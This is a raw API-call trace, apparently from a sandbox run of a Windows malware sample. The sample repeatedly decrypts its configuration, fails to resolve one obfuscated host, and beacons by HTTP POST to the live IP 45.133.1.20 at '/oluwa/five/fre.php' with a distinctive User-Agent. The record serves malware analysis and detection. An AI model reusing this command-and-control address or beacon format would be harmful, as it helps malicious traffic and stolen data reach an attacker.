[0155.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0155.762] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.763] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0155.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.764] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0155.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.765] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0155.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.766] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0155.766] GetProcessHeap () returned 0x6a0000 [0155.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3698 [0155.766] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0155.766] GetProcessHeap () returned 0x6a0000 [0155.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0155.766] socket (af=2, type=1, protocol=6) returned 0x260 [0155.767] connect (s=0x260, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0155.797] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0155.797] GetProcessHeap () returned 0x6a0000 [0155.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bc088 [0155.797] GetProcessHeap () returned 0x6a0000 [0155.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0155.798] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0155.799] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0155.799] GetProcessHeap () returned 0x6a0000 [0155.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc110 [0155.799] GetProcessHeap () returned 0x6a0000 [0155.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0155.800] GetProcessHeap () returned 0x6a0000 [0155.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0155.800] GetProcessHeap () returned 0x6a0000 [0155.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0155.802] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0155.803] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0155.803] GetProcessHeap () returned 0x6a0000 [0155.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc1d0 [0155.803] GetProcessHeap () returned 0x6a0000 [0155.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0155.820] send (s=0x260, buf=0x6bc1d0*, len=242, flags=0) returned 242 [0155.820] send (s=0x260, buf=0x6bb998*, len=159, flags=0) returned 159 [0155.820] GetProcessHeap () returned 0x6a0000 [0155.820] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0155.821] recv (in: s=0x260, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0155.925] GetProcessHeap () returned 0x6a0000 [0155.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc1d0 | out: hHeap=0x6a0000) returned 1 [0155.925] GetProcessHeap () returned 0x6a0000 [0155.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0155.927] GetProcessHeap () returned 0x6a0000 [0155.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc110 | out: hHeap=0x6a0000) returned 1 [0155.928] GetProcessHeap () returned 0x6a0000 [0155.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc088 | out: hHeap=0x6a0000) returned 1 [0155.928] closesocket (s=0x260) returned 0 [0155.930] GetProcessHeap () returned 0x6a0000 [0155.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0155.930] GetProcessHeap () returned 0x6a0000 [0155.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0155.932] GetProcessHeap () returned 0x6a0000 [0155.932] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0155.935] GetProcessHeap () returned 0x6a0000 [0155.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3698 | out: hHeap=0x6a0000) returned 1 [0155.936] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x135c) returned 0x260 [0155.938] Sleep (dwMilliseconds=0xea60) [0155.940] GetProcessHeap () returned 0x6a0000 [0155.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0155.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.941] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.949] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0155.958] GetProcessHeap () returned 0x6a0000 [0155.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0155.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.959] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0155.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.961] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0155.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.962] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0155.962] GetProcessHeap () returned 0x6a0000 [0155.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0155.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.964] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0155.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.968] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0155.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.976] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0155.976] GetProcessHeap () returned 0x6a0000 [0155.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0155.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.981] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0155.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0155.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0155.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.985] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0155.985] GetProcessHeap () returned 0x6a0000 [0155.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0155.985] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0155.985] GetProcessHeap () returned 0x6a0000 [0155.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0155.986] GetProcessHeap () returned 0x6a0000 [0155.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0155.987] GetProcessHeap () returned 0x6a0000 [0155.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0155.987] GetProcessHeap () returned 0x6a0000 [0155.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0155.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.998] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0156.006] GetProcessHeap () returned 0x6a0000 [0156.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0156.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.007] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.008] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.011] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.011] GetProcessHeap () returned 0x6a0000 [0156.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0156.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.012] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0156.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.013] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.014] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0156.014] GetProcessHeap () returned 0x6a0000 [0156.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.015] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0156.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.016] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0156.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.017] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0156.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.018] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0156.018] GetProcessHeap () returned 0x6a0000 [0156.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.018] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0156.018] GetProcessHeap () returned 0x6a0000 [0156.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0156.018] socket (af=2, type=1, protocol=6) returned 0x264 [0156.022] connect (s=0x264, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0156.047] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0156.047] GetProcessHeap () returned 0x6a0000 [0156.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bc198 [0156.047] GetProcessHeap () returned 0x6a0000 [0156.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0156.048] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.049] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0156.049] GetProcessHeap () returned 0x6a0000 [0156.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc220 [0156.049] GetProcessHeap () returned 0x6a0000 [0156.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.050] GetProcessHeap () returned 0x6a0000 [0156.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0156.050] GetProcessHeap () returned 0x6a0000 [0156.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0156.050] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.051] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0156.051] GetProcessHeap () returned 0x6a0000 [0156.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc2e0 [0156.051] GetProcessHeap () returned 0x6a0000 [0156.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.052] send (s=0x264, buf=0x6bc2e0*, len=242, flags=0) returned 242 [0156.052] send (s=0x264, buf=0x6bb998*, len=159, flags=0) returned 159 [0156.053] GetProcessHeap () returned 0x6a0000 [0156.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0156.053] recv (in: s=0x264, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0156.121] GetProcessHeap () returned 0x6a0000 [0156.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc2e0 | out: hHeap=0x6a0000) returned 1 [0156.121] GetProcessHeap () returned 0x6a0000 [0156.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0156.122] GetProcessHeap () returned 0x6a0000 [0156.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc220 | out: hHeap=0x6a0000) returned 1 [0156.122] GetProcessHeap () returned 0x6a0000 [0156.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc198 | out: hHeap=0x6a0000) returned 1 [0156.123] closesocket (s=0x264) returned 0 [0156.123] GetProcessHeap () returned 0x6a0000 [0156.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0156.123] GetProcessHeap () returned 0x6a0000 [0156.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.123] GetProcessHeap () returned 0x6a0000 [0156.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0156.124] GetProcessHeap () returned 0x6a0000 [0156.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0156.124] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1360) returned 0x264 [0156.127] Sleep (dwMilliseconds=0xea60) [0156.128] GetProcessHeap () returned 0x6a0000 [0156.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0156.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.157] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbe70) returned 1 [0156.166] GetProcessHeap () returned 0x6a0000 [0156.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0be0 [0156.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.167] CryptImportKey (in: hProv=0x6bbe70, pbData=0x6b0be0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.169] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.170] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.170] GetProcessHeap () returned 0x6a0000 [0156.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0be0 | out: hHeap=0x6a0000) returned 1 [0156.171] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.171] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0156.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.200] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.201] CryptReleaseContext (hProv=0x6bbe70, dwFlags=0x0) returned 1 [0156.201] GetProcessHeap () returned 0x6a0000 [0156.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.202] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.203] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.203] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.204] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.204] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.205] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.205] GetProcessHeap () returned 0x6a0000 [0156.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.205] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0156.206] GetProcessHeap () returned 0x6a0000 [0156.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0156.206] GetProcessHeap () returned 0x6a0000 [0156.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.206] GetProcessHeap () returned 0x6a0000 [0156.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0156.206] GetProcessHeap () returned 0x6a0000 [0156.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0156.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.207] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0156.219] GetProcessHeap () returned 0x6a0000 [0156.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0156.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.221] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.222] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.223] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.223] GetProcessHeap () returned 0x6a0000 [0156.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0156.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.225] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0156.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.226] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.226] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0156.226] GetProcessHeap () returned 0x6a0000 [0156.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.227] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0156.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.228] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0156.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.229] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0156.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.230] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0156.230] GetProcessHeap () returned 0x6a0000 [0156.230] RtlAllocateHeap 